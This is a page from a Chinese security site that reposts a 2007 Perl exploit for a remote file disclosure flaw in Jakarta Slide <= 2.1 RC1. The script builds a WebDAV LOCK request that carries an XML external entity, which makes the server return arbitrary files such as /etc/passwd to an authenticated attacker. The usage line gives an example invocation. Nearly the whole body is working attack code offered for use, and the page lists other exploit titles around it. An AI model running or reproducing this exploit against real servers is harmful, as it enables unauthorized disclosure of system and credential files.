首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Jakarta Slide <= 2.1 RC1 Remote File Disclosure Exploit 来源：www.vfocus.net 作者：eliteb0y 发布时间：2007-10-25   #!/usr/bin/perl #****************************************************** # Jakarta Slide Remote File Disclosure Zeroday Xploit # eliteb0y / 2007 # # thanx to the whole team & andi :) # +++KEEP PRIV8+++ # # This Bug may reside in different WebDav implementations, # Warp your mind! # +You will need auth for the exploit to work... #****************************************************** use IO::Socket; use MIME::Base64; ### FIXME! Maybe support other auths too ? # SET REMOTE PORT HERE $remoteport = 8080; sub usage { print "Jakarta Slide Remote File Disclosure Zeroday Xploit\n"; print "eliteb0y / 2007\n"; print "usage: perl JAKARTAXPL <remotehost> <slide file> <file to retrieve> [username] [password]\n"; print "example: perl JAKARTAXPL www.hostname.com /slide/users/guest /etc/passwd guest guest\n";exit; } if ($#ARGV < 2) {usage();} $hostname = $ARGV[0]; $webdavfile = $ARGV[1]; $remotefile = $ARGV[2]; $username = $ARGV[3]; $password = $ARGV[4]; my $sock = IO::Socket::INET->new(PeerAddr => $hostname,                               PeerPort => $remoteport,                               Proto    => 'tcp');                               $|=1; $BasicAuth = encode_base64("$username:$password"); $KRADXmL = "<?xml version=\"1.0\"?>\n" ."<!DOCTYPE REMOTE [\n" ."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n" ."]>\n" ."<D:lockinfo xmlns:D='DAV:'>\n" ."<D:lockscope><D:exclusive/></D:lockscope>\n" ."<D:locktype><D:write/></D:locktype>\n" ."<D:owner>\n" ."<D:href>\n" ."<REMOTE>\n" ."<RemoteX>&RemoteX;</RemoteX>\n" ."</REMOTE>\n" ."</D:href>\n" ."</D:owner>\n" ."</D:lockinfo>\n"; print "Jakarta Slide Remote File Disclosure Zeroday Xploit\n"; print "eliteb0y / 2007\n"; print "Launching Remote Exploit...\n"; $ExploitRequest = "LOCK $webdavfile HTTP/1.1\r\n" ."Host: $hostname\r\n"; if ($username ne "") { $ExploitRequest .= "Authorization: Basic $BasicAuth"; } $ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL; print $sock $ExploitRequest; while(<$sock>) { print; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·eIQnetworks ESA SEARCHREPORT R ·IBM Tivoli Storage Manager 5.3 ·Oracle 10g CTX_DOC.MARKUP SQL ·IBM Lotus Domino 7.0.2FP1 IMAP ·DNS Recursion bandwidth amplif ·GOM Player 2.1.6.3499 (GomWeb3 ·Mozilla Firefox <= 2.0.0.7 Rem ·Sony CONNECT Player 4.x (m3u F ·PHP 5.x COM functions safe_mod ·Kodak Image Viewer TIF/TIFF Co ·Apache Tomcat (webdav) Remote ·PHP-AGTC membership system 1.1   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved